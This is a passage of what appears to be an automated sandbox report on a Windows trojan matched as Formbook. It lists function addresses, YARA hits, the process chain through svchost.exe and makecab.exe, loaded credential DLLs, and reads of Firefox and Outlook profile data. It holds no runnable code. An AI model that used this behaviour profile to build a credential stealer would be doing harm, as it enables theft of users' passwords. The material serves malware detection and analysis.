            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385FDC01_2_0385FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03843D401_2_03843D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F1D5A1_2_038F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F7D731_2_038F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFCF21_2_038FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B9C321_2_038B9C32
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047924466_2_04792446
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047844206_2_04784420
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0478E4F66_2_0478E4F6
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046E05356_2_046E0535
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047A05916_2_047A0591
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046FC6E06_2_046FC6E0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046E07706_2_046E0770
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047047506_2_04704750
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046DC7C06_2_046DC7C0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047720006_2_04772000
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047681586_2_04768158
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046D01006_2_046D0100
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0477A1186_2_0477A118
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047981CC6_2_047981CC
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047A01AA6_2_047A01AA
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047941A26_2_047941A2
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047802746_2_04780274
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047602C06_2_047602C0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0479A3526_2_0479A352
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047A03E66_2_047A03E6
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046EE3F06_2_046EE3F0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046E0C006_2_046E0C00
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046D0CF26_2_046D0CF2
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04780CB56_2_04780CB5
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0477CD1F6_2_0477CD1F
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046EAD006_2_046EAD00
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046DADE06_2_046DADE0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046F8DBF6_2_046F8DBF
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046E0E596_2_046E0E59
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0479EE266_2_0479EE26
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0479EEDB6_2_0479EEDB
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0479CE936_2_0479CE93
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046F2E906_2_046F2E90
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04754F406_2_04754F40
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04700F306_2_04700F30
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04782F306_2_04782F30
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04722F286_2_04722F28
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046D2FC86_2_046D2FC8
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0475EFA06_2_0475EFA0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046E28406_2_046E2840
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046EA8406_2_046EA840
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046E880D6_2_046E880D
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0470E8F06_2_0470E8F0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046C68B86_2_046C68B8
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046F69626_2_046F6962
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046E29A06_2_046E29A0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047AA9A66_2_047AA9A6
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046DEA806_2_046DEA80
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0479AB406_2_0479AB40
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04796BD76_2_04796BD7
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046D14606_2_046D1460
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0479F43F6_2_0479F43F
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047975716_2_04797571
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047A95C36_2_047A95C3
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0477D5B06_2_0477D5B0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047256306_2_04725630
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047916CC6_2_047916CC
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0479F7B06_2_0479F7B0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047970E96_2_047970E9
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0479F0E06_2_0479F0E0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046E70C06_2_046E70C0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0478F0CC6_2_0478F0CC
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047AB16B6_2_047AB16B
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0471516C6_2_0471516C
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046CF1726_2_046CF172
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046EB1B06_2_046EB1B0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047812ED6_2_047812ED
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046FD2F06_2_046FD2F0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046FB2C06_2_046FB2C0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046E52A06_2_046E52A0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046CD34C6_2_046CD34C
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0479132D6_2_0479132D
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0472739A6_2_0472739A
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04759C326_2_04759C32
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0479FCF26_2_0479FCF2
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04797D736_2_04797D73
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04791D5A6_2_04791D5A
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046E3D406_2_046E3D40
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046FFDC06_2_046FFDC0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046E9EB06_2_046E9EB0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0479FF096_2_0479FF09
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046A3FD26_2_046A3FD2
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046A3FD56_2_046A3FD5
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0479FFB16_2_0479FFB1
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046E1F926_2_046E1F92
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0474D8006_2_0474D800
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046E38E06_2_046E38E0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046E99506_2_046E9950
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046FB9506_2_046FB950
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047759106_2_04775910
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04753A6C6_2_04753A6C
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0479FA496_2_0479FA49
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04797A466_2_04797A46
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0478DAC66_2_0478DAC6
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04725AA06_2_04725AA0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0477DAAC6_2_0477DAAC
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04781AA36_2_04781AA3
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0479FB766_2_0479FB76
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04755BF06_2_04755BF0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0471DBF96_2_0471DBF9
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_046FFB806_2_046FFB80
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02821A406_2_02821A40
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0283A4606_2_0283A460
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0281AEB06_2_0281AEB0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0281CE306_2_0281CE30
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0281CC076_2_0281CC07
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0281CC106_2_0281CC10
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_028235706_2_02823570
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_028235756_2_02823575
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0459C0446_2_0459C044
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0459B0A86_2_0459B0A8
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0459A3B36_2_0459A3B3
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0459BCA36_2_0459BCA3
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0459BB846_2_0459BB84
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 58 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: String function: 008A8B40 appears 42 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: String function: 008A0D27 appears 70 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: String function: 00887F41 appears 35 times
            Source: C:\Windows\SysWOW64\makecab.exeCode function: String function: 0475F290 appears 103 times
            Source: C:\Windows\SysWOW64\makecab.exeCode function: String function: 046CB970 appears 262 times
            Source: C:\Windows\SysWOW64\makecab.exeCode function: String function: 04715130 appears 58 times
            Source: C:\Windows\SysWOW64\makecab.exeCode function: String function: 0474EA12 appears 86 times
            Source: C:\Windows\SysWOW64\makecab.exeCode function: String function: 04727E54 appears 107 times
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1657367738.0000000003CAD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1657159366.0000000003B03000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4099201806.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1983942569.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4100789193.0000000005070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4100844845.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1984670172.0000000006350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@16/11
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008EA2D5 GetLastError,FormatMessageW,0_2_008EA2D5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008D8713 AdjustTokenPrivileges,CloseHandle,0_2_008D8713
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008D8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_008D8CC3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008EB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_008EB59E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008FF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_008FF121
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008F86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_008F86D0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_00884FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00884FE9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeFile created: C:\Users\user\AppData\Local\Temp\aut8C0D.tmpJump to behavior
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: makecab.exe, 00000006.00000002.4099520220.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.2165763164.00000000029A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeReversingLabs: Detection: 36%
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeVirustotal: Detection: 29%
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe"
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeProcess created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\SysWOW64\makecab.exe"
            Source: C:\Windows\SysWOW64\makecab.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe"Jump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeProcess created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\SysWOW64\makecab.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\makecab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeStatic file information: File size 1179136 > 1048576
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
